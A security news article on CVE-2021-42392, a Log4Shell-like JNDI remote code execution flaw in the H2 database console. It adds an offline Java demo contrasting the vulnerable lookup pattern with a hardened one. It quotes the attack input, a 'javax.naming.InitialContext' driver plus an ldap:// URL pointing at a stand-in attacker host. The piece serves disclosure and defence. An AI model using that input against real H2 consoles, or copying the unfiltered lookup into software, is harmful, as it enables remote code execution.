Researchers Warn of New Log4Shell-Like Java Vulnerability
Security researchers are warning of a critical new Java bug that shares its root cause with Log4Shell, the notorious vulnerability currently being exploited around the globe.
CVE-2021-42392 has yet to be officially published in the National Vulnerability Database (NVD), but according to JFrog, which found it, it affects the web console of the popular H2 Java SQL database.
The security firm urged any organization running an H2 console that is reachable from its LAN or WAN to update the database immediately to version 2.0.206, or risk attackers exploiting it for unauthenticated remote code execution (RCE).
Like Log4Shell, the bug hinges on JNDI (Java Naming and Directory Interface) "remote class loading." JNDI is an API that provides naming and directory functionality for Java apps. If attacker-controlled input reaches a JNDI lookup as a URL such as ldap://attacker.example/Exploit, the lookup can make the JVM fetch and instantiate classes from the attacker's server, which is what turns a lookup into RCE.
“In a nutshell, the root cause is similar to Log4Shell – several code paths in the H2 database framework pass unfiltered attacker-controlled URLs to the javax.naming.Context.lookup function, which allows for remote codebase loading (AKA Java code injection AKA remote code execution),” JFrog explained.
“Specifically, the org.h2.util.JdbcUtils.getConnection method takes a driver class name and database URL as parameters. If the driver’s class is assignable to the javax.naming.Context class, the method instantiates an object from it and calls its lookup method.”
It added that supplying a driver class such as “javax.naming.InitialContext” and a URL as simple as ldap://attacker.com/Exploit will lead to remote code execution.
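The dispatch JFrog describes, modelled as an added example: this is not H2's code or JFrog's proof of concept. Assumptions: `RecordingContext` is a stand-in for `javax.naming.InitialContext` that records the URL instead of resolving it, so the program runs offline; `getConnectionVulnerable` reproduces the pattern described above (driver class assignable to `javax.naming.Context` is instantiated and its `lookup` is called with the caller's URL); `getConnectionHardened` shows one way to close the hole by refusing non-local JNDI URLs before instantiating anything. That check reflects the intent of the fix as described on this page, not the exact code shipped in 2.0.206. The hostname in the sample URL is constructed.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.util.ArrayList;
import java.util.List;

// Added example (not H2's code): models how an attacker-controlled driver class
// name and database URL flow into javax.naming.Context.lookup.
public class JndiDriverDemo {

    /** Stand-in for javax.naming.InitialContext (assumption): records the URL instead of resolving it. */
    public static class RecordingContext extends InitialContext {
        static final List<String> LOOKUPS = new ArrayList<>();

        public RecordingContext() throws NamingException {
            super(true); // lazy: no real JNDI provider is initialised
        }

        @Override
        public Object lookup(String name) {
            LOOKUPS.add(name);
            return "<would load code from " + name + ">";
        }
    }

    /** Vulnerable pattern: both driver and url come straight from the caller. */
    static Object getConnectionVulnerable(String driver, String url) throws Exception {
        Class<?> d = Class.forName(driver);
        if (Context.class.isAssignableFrom(d)) {
            Context ctx = (Context) d.getDeclaredConstructor().newInstance();
            // With a real InitialContext and an ldap:// or rmi:// URL this is the
            // remote codebase loading step JFrog describes.
            return ctx.lookup(url);
        }
        throw new IllegalArgumentException("not a JNDI driver class (demo only): " + driver);
    }

    /** Hardened pattern (assumption: illustrates the intent of the fix, not H2's exact code). */
    static Object getConnectionHardened(String driver, String url) throws Exception {
        Class<?> d = Class.forName(driver);
        if (Context.class.isAssignableFrom(d)) {
            // Only the local "java:" namespace is acceptable; ldap:, rmi:, dns: and
            // friends can point at a server the attacker controls. Reject before
            // instantiating anything so the driver class never gets to run.
            if (!url.startsWith("java:")) {
                throw new SecurityException("remote JNDI URL rejected: " + url);
            }
            Context ctx = (Context) d.getDeclaredConstructor().newInstance();
            return ctx.lookup(url);
        }
        throw new IllegalArgumentException("not a JNDI driver class (demo only): " + driver);
    }

    public static void main(String[] args) throws Exception {
        // An attacker would supply "javax.naming.InitialContext"; the stand-in keeps this offline.
        String driver = RecordingContext.class.getName();
        String url = "ldap://attacker.example/Exploit"; // constructed sample URL

        Object result = getConnectionVulnerable(driver, url);
        System.out.println("vulnerable path returned: " + result);
        System.out.println("URLs that reached Context.lookup: " + RecordingContext.LOOKUPS);

        try {
            getConnectionHardened(driver, url);
            System.out.println("hardened path unexpectedly allowed the lookup");
        } catch (SecurityException e) {
            System.out.println("hardened path: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac JndiDriverDemo.java && java JndiDriverDemo`. The vulnerable path shows the attacker's URL arriving intact at `Context.lookup`; the hardened path rejects it before any driver object exists. One caveat a practitioner should keep in mind: since JDK 8u191 and 11.0.1 the `com.sun.jndi.ldap.object.trustURLCodebase` property defaults to `false`, which blocks the simplest remote-class-loading variant, but JNDI lookups can still be steered into deserialization of attacker-supplied objects, so patching and removing network exposure of the console remain the correct response rather than relying on the JDK version.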
JFrog said the vulnerability is particularly dangerous because the H2 database package is so widely used: it is one of the top 50 most popular Maven packages, with almost 7000 artifact dependencies, the firm claimed.
However, there are reasons why exploitation is unlikely to be as widespread as Log4Shell. For one, the bug has a "direct scope of impact": the vulnerable component is the exposed H2 console itself, not a logging library that any application might feed with attacker input, so affected servers should be easier to find and fix.
Second, in most H2 distributions the console binds only to localhost, so the default configuration is not remotely exploitable.
“Many vendors may be running the H2 database, but not running the H2 console,” JFrog added. “Although there are other vectors to exploit this issue other than the console, these other vectors are context-dependent and less likely to be exposed to remote attackers.”